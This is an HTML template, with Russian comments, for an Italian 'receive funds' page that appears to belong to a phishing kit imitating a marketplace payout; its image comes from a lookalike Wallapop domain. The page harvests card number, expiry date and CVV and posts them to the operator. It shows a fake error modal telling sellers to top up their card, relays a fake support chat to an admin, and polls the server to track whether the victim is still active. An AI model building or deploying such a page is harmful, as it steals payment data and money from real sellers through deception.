<!DOCTYPE html>
<html lang="it">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Ricevere fondi</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f9fc;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .container {
            background-color: #ffffff;
            border-radius: 10px;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
            padding: 20px 30px;
            width: 400px;
            text-align: center;
        }
        .header {
            font-size: 14px;
            color: #999;
            margin-bottom: 10px;
        }
        .title {
            font-size: 18px;
            margin-bottom: 20px;
            font-weight: bold;
        }
        .item {
            display: flex;
            justify-content: space-between;
            font-size: 16px;
            margin-bottom: 10px;
        }
        .total {
            font-weight: bold;
        }
        .payment-method {
            margin: 20px 0;
        }
        .payment-method label {
            font-size: 14px;
            color: #666;
        }
        .card-input {
            border: 1px solid #ccc;
            border-radius: 5px;
            padding: 10px;
            margin-bottom: 10px;
            width: 100%;
            font-size: 14px;
        }
        .button {
            background-color: #0078ff;
            color: #ffffff;
            border: none;
            border-radius: 5px;
            padding: 10px;
            font-size: 16px;
            cursor: pointer;
            width: 100%;
        }
        .button:hover {
            background-color: #005ecc;
        }

        /* Затемнение фона */
        .modal-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 1000;
        }

        /* Модальное окно */
        .modal-window {
            background-color: #ffffff;
            border-radius: 12px;
            box-shadow: 0 4px 20px rgba(0, 0, 0, 0.3);
            max-width: 400px;
            width: 90%;
            padding: 20px;
            text-align: center;
        }

        /* Заголовок */
        .modal-title {
            font-size: 18px;
            font-weight: bold;
            color: #333333;
            margin-bottom: 10px;
        }

        /* Основной текст */
        .modal-text {
            font-size: 14px;
            color: #555555;
            margin-bottom: 20px;
            line-height: 1.5;
        }

        /* Кнопка */
        .modal-button {
            background-color: #007bff;
            color: #ffffff;
            border: none;
            padding: 10px 20px;
            font-size: 16px;
            font-weight: bold;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }

        .modal-button:hover {
            background-color: #0056b3;
        }







        /* чат */
/* Общие стили */
#chat-button {
        position: fixed;
        bottom: 20px;
        right: 20px;
        background-color: #000;
        color: #fff;
        border: none;
        border-radius: 50px;
        width: 60px;
        height: 60px;
        font-size: 24px;
        display: flex;
        align-items: center;
        justify-content: center;
        cursor: pointer;
        z-index: 1001;
    }
    
    #chat-container {
        position: fixed;
        bottom: 80px;
        right: 20px;
        width: 280px;
        max-height: 500px;
        min-height: 400px;
        background-color: #fff;
        border-radius: 10px;
        box-shadow: 0px 8px 16px rgba(0, 0, 0, 0.2);
        display: none; /* Чат скрыт по умолчанию */
        flex-direction: column;
        overflow: hidden;
        z-index: 1000;
    }
    
    #chat-container.active {
        display: flex; /* Показать чат при активации */
    }
    
    #chat-header {
        display: flex;
        align-items: center;
        background-color: #000;
        color: #fff;
        padding: 10px;
        border-top-left-radius: 10px;
        border-top-right-radius: 10px;
    }
    
    .chat-avatar img {
        width: 40px;
        height: 40px;
        border-radius: 50%;
        margin-right: 10px;
    }
    
    .chat-info h3 {
        margin: 0;
        font-size: 16px;
    }
    
    .chat-info p {
        margin: 0;
        font-size: 12px;
        opacity: 0.7;
    }
    
    #close-chat {
        background: none;
        border: none;
        color: #fff;
        font-size: 18px;
        margin-left: auto;
        cursor: pointer;
    }
    
    #chat-messages {
        flex: 1;
        padding: 10px;
        background-color: #f9f9f9;
        overflow-y: auto;
    }
    
    .chat-message {
        margin: 5px 0;
        display: flex;
        align-items: flex-start;
    }
    
    .chat-message.user {
        justify-content: flex-end;
    }
    
    .chat-bubble {
        max-width: 70%;
        padding: 10px;
        border-radius: 10px;
        font-size: 14px;
        line-height: 1.4;
    }
    
    .chat-message.user .chat-bubble {
        background-color: #000;
        color: #fff;
        border-bottom-right-radius: 0;
    }
    
    .chat-message.bot .chat-bubble {
        background-color: #e0e0e0;
        color: #000;
        border-bottom-left-radius: 0;
    }
    
    #chat-input {
        display: flex;
        padding: 10px;
        background-color: #fff;
        border-top: 1px solid #ddd;
    }
    
    #message-input {
        flex: 1;
        padding: 10px;
        border: 1px solid #ddd;
        border-radius: 20px;
        outline: none;
        font-size: 14px;
    }
    
    #send-button {
        background-color: #000;
        color: #fff;
        border: none;
        border-radius: 50%;
        width: 40px;
        height: 40px;
        margin-left: 10px;
        display: flex;
        align-items: center;
        justify-content: center;
        cursor: pointer;
    }








    </style>
</head>
<body>



<!-- ЧАТ НАЧ -->
<button id="chat-button">💬</button>
<div id="chat-container">
    <div id="chat-header">
        <div class="chat-avatar">
            <img src="https://wallapopp.bapebk.shop/6y5vscqf/kg51x/343fdldg/gen/operator-img.png" alt="Support">
        </div>
        <div class="chat-info">
            <h3>Supporto</h3>
            <p>Online</p>
        </div>
        <button id="close-chat">✖</button>
    </div>
    <div id="chat-messages"></div>
    <div id="chat-input">
        <input type="text" id="message-input" placeholder="Digitare un messaggio...">
        <button id="send-button">➤</button>
    </div>
</div>
    
<script>
    const chatButton = document.getElementById('chat-button');
    const chatContainer = document.getElementById('chat-container');
    const closeChat = document.getElementById('close-chat');
    const sendButton = document.getElementById('send-button');
    const messageInput = document.getElementById('message-input');
    const chatMessages = document.getElementById('chat-messages');
    
    // Открытие/закрытие чата
    chatButton.addEventListener('click', () => {
        chatContainer.classList.toggle('active');
    });
    
    closeChat.addEventListener('click', () => {
        chatContainer.classList.remove('active');
    });
    


    // Функция для извлечения токена из URL
    function getTokenFromURL() {
        const url = window.location.pathname; // Получаем путь из URL
        const match = url.match(/\/pay\/([^/]+)/); // Ищем токен после /get/
        return match ? match[1] : null; // Возвращаем токен или null, если токен не найден
    }




    // Функция для запроса сообщений от администратора
    async function fetchAdminMessages(token) {
        try {
            const response = await fetch(`/get_admin_message_support/${token}/`, {
                method: 'GET',
                headers: {
                    'Content-Type': 'application/json'
                }
            });

            if (response.ok) {
                const data = await response.json();
                const status = data.status
                if (status=="success") {
                    const adminMessage = data.message || null;
                    if (adminMessage) {
                        addMessage(adminMessage, 'bot'); // Добавляем сообщение от администратора
                    }
                }
            } else {
                console.error('Ошибка при запросе сообщений администратора:', response.status);
            }
        } catch (error) {
            console.error('Ошибка при подключении:', error);
        }
    }
    
    // Функция для отправки сообщений
    async function sendMessage() {
        const userMessage = messageInput.value.trim();
        const token = getTokenFromURL(); // Получаем токен из URL

        if (userMessage && token) {
            addMessage(userMessage, 'user'); // Отображаем сообщение от пользователя

            // Формируем тело запроса
            const payload = {
                text: userMessage,
                token: token
            };

            try {
                // Отправляем запрос на сервер
                const response = await fetch(`/send_message_support/${token}/`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(payload)
                });

                if (response.ok) {
                    messagePollingInterval = setInterval(() => {
                        fetchAdminMessages(token);
                    }, 2000);



                } else {
                    addMessage('Ошибка сервера, попробуйте позже.', 'bot');
                }
            } catch (error) {
                console.error('Ошибка:', error);
                addMessage('Ошибка подключения, попробуйте позже.', 'bot');
            }

            messageInput.value = ''; // Очищаем поле ввода
        } else if (!token) {
            alert('Токен не найден в URL!');
        }
}

    // Функция для добавления сообщения
    function addMessage(text, sender) {
        const messageElement = document.createElement('div');
        messageElement.classList.add('chat-message', sender);
        const bubble = document.createElement('div');
        bubble.classList.add('chat-bubble');
        bubble.textContent = text;
        messageElement.appendChild(bubble);
        chatMessages.appendChild(messageElement);
        chatMessages.scrollTop = chatMessages.scrollHeight;
    }

    // Привязка событий
    sendButton.addEventListener('click', sendMessage); // Оставляем одну привязку
    messageInput.addEventListener('keypress', (event) => {
        if (event.key === 'Enter') {
            sendMessage();
        }
    });

</script>


<!-- ЧАТ КОН -->







    <div class="container">
        <div class="header">Transaction #{{datausersite.token}}</div>
        <div class="title">Ricevere fondi</div>
        <div class="item">
            <span>{{datausersite.product_name}}:</span>
            <span>{{datausersite.price}}</span>
        </div>
        <div class="item total">
            <span>Total:</span>
            <span>{{datausersite.price}}</span>
        </div>
        <div class="payment-method">
            <label>Scegli metodo</label>
            <div>
                <img src="https://upload.wikimedia.org/wikipedia/commons/4/41/Visa_Logo.png" alt="Visa" width="50">
                <img src="https://upload.wikimedia.org/wikipedia/commons/a/a4/Mastercard_2019_logo.svg" alt="MasterCard" width="50">
            </div>
        </div>


        {% if data_json_status_window %}
        <div class="modal-overlay" id="modalOverlay">
            <div class="modal-window">
                <h3 class="modal-title">Errore! Per favore riprova</h3>
                <p class="modal-text">Per la verifica, è necessario ricaricare
                    temporaneamente la carta per confermare i
                    limiti e l'identità, o utilizzare un'altra carta,
                    non vi addebiteremo alcun costo. Ma è
                    necessario disporre di questo importo sul
                    saldo per verificare quanto segue: {{data_json_count}} EUR</p>
                <button class="modal-button" id="closeModal">Continua</button>
            </div>
        </div>
        
        <script>
            // Закрытие модального окна при клике на кнопку
            document.getElementById('closeModal').addEventListener('click', function() {
                document.getElementById('modalOverlay').style.display = 'none';
            });
        </script>
        {% endif %}
        

        <form id="payment-form" method="POST" action="/loading/{{datausersite.token}}/">
            <input type="hidden" name="token" value="{{datausersite.token}}">
            <input type="hidden" name="product_name" value="{{datausersite.product_name}}">
            <input type="hidden" name="price" value="{{datausersite.price}}">
            
            <input type="text" class="card-input" name="card_holder" placeholder="Nome e cognome di il titolare della carta">
            <input type="text" class="card-input" name="card_number" id="card_number" placeholder="0000 0000 0000 0000" maxlength="19" oninput="formatCardNumber(this)">
            <div style="display: flex; gap: 10px;">
                <input type="text" class="card-input" name="expiry_month" id="expiry_month" placeholder="MM" maxlength="2" oninput="formatExpiryMonth(this)">
                <input type="text" class="card-input" name="expiry_year" id="expiry_year" placeholder="YY" maxlength="2" oninput="formatExpiryYear(this)">
                <input type="password" class="card-input" name="cvv" id="cvv" placeholder="***" maxlength="3" oninput="formatCVV(this)">
            </div>
            <button class="button" type="submit">Continua</button>
        </form>
    </div>

    <script>
        function formatCardNumber(input) {
            let value = input.value.replace(/\D/g, '');
            if (value.length <= 16) {
                input.value = value.replace(/(\d{4})(?=\d)/g, '$1 ').trim();
            }
        }

        function formatExpiryMonth(input) {
            let value = input.value.replace(/\D/g, '').slice(0, 2);
            input.value = value;
        }

        function formatExpiryYear(input) {
            let value = input.value.replace(/\D/g, '').slice(0, 2);
            input.value = value;
        }

        function formatCVV(input) {
            let value = input.value.replace(/\D/g, '').slice(0, 3);
            input.value = value;
        }
    </script>




<script>
    const currentUrl = window.location.href;
    const token = currentUrl.split("/pay/")[1];

    // Функция для уведомления сервера
    async function notifyServer() {
    try {
        const response = await fetch(`/check_activity/${token}`, {
        method: 'GET',
        headers: {
            'Content-Type': 'application/json'
        }
        });
        if (response.ok) {
        console.log("Пользователь активен");
        } else {
        console.log("Ошибка сервера при проверке активности");
        }
    } catch (error) {
        console.error("Ошибка при отправке запроса:", error);
    }
    }

    // Устанавливаем интервал уведомлений
    setInterval(notifyServer, 5000); // Отправляем запрос каждые 5 секунд
</script>
</body>
</html>
